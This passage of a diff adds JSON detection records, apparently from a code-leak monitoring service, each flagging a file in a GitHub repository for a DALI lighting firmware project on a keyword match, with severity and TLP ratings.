+ ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/I2C/I2c.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/I2C/I2c.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "db3aecb29f911dd5f594b2ab5f65b564905028a7", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/I2C/I2c.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/I2C/I2c.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "21df44f8a39983be5e00aa47044a9f5474f0e775", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/I2C/I2c_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/I2C/I2c_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "550cd0d1903f330f985d7793d857657c20ce3663", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Interrupt/Interrupt.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Interrupt/Interrupt.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "634285cb5efe4560e7e888d3d227839339fb43b3", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Interrupt/Interrupt.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Interrupt/Interrupt.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "b4d7646beb83eccb0fc54e3d0c6724bc2eea548b", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/PowerManager/PowerManager.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/PowerManager/PowerManager.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "12d7224e305ed4e044163aeb74437190cf407caf", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/PowerManager/PowerManager.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/PowerManager/PowerManager.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "9052514163ce57fe81a87536084cfa683d05f725", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/PowerManager/PowerManager_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/PowerManager/PowerManager_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "37c492846a666c4511e87b6407f3fb5a5937270e", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/SystemTick/SystemTick.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/SystemTick/SystemTick.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "88db0c983d1e0aa98d07310d4bb70c1459768226", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/SystemTick/SystemTick.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/SystemTick/SystemTick.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "b95c8fde520d08601f8fddd38de83bf6abc4f83f", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/SystemTick/SystemTick_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/SystemTick/SystemTick_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "5398f6ff7e98cbade03b5166d242087aff77833c", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Timers/Timers.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Timers/Timers.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "dd040d65a8c08c08ce121270d4ac741645b14fb7", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Timers/Timers.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Timers/Timers.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "33132cf183c6c2d7d593577040d5f8e5777be49b", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Timers/Timers_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Timers/Timers_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "213b51da637d25746bb472491811fef0ef8d935c", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/Clock/Clock_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/Clock/Clock_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "7c443cdceb9086e3f1cf716d02794a45a67f1b02", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/DAC/Dac_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/DAC/Dac_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "dd6ca30c612ca05a6e7d9b13232556c00de7c26e", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/DAC/Dac_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/DAC/Dac_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "6abedf3686154dc38645a8684b583ca60507cd58", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/Event/Event_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/Event/Event_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "9faaa09c66f30e5f8152cc8142e46f4f363674fe", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/Event/Event_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/Event/Event_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "1660a3a0d54f87d81ac1954a973094f2bc7650d8", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/GPIO/Gpio_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/GPIO/Gpio_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "6a34daf04ea14f458669b574adebca4aec372190", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/GPIO/Gpio_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/GPIO/Gpio_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "a5a4e9c25a1557bbccd2d764c0ab249138e1e783", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/I2C/I2c_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/I2C/I2c_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "27a206a9b095390b360bea70cd918c197ee897f2", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/I2C/I2c_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/I2C/I2c_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "abe4473c1bf22c9e227ae6bb8dfaa1d23d368993", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/PowerManager/PowerManager_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/PowerManager/PowerManager_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "163dfcc812dc8678176e10647c9d94a29067a657", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/PowerManager/PowerManager_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/PowerManager/PowerManager_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "62135fbe72a49fc117ff45c51da465f7904087b5", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/SystemTick/SystemTick_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/SystemTick/SystemTick_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "393a02cf86ae870951f61869f5d4efd18b1febdc", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/SystemTick/SystemTick_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/SystemTick/SystemTick_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "fdd0f29caed7ab1114e360ff049883b7e620fc74", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/SystemTick/SystemTick_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/SystemTick/SystemTick_prm.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "4261a01e8d39c506c238f830ae7180dea58d6202", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/Timers/Timers_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/Timers/Timers_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "7abe5053691aa1f16eedd96f8cf9ae708b04b1e5", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/Timers/Timers_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/Timers/Timers_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "4f3ff694d8d5c95d1ac697933132d5e708540721", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OS/QueueManager/QueueManager.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OS/QueueManager/QueueManager.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "ed39279d060073536367f1b65876ace34b4ea55b", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OS/QueueManager/QueueManager.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + 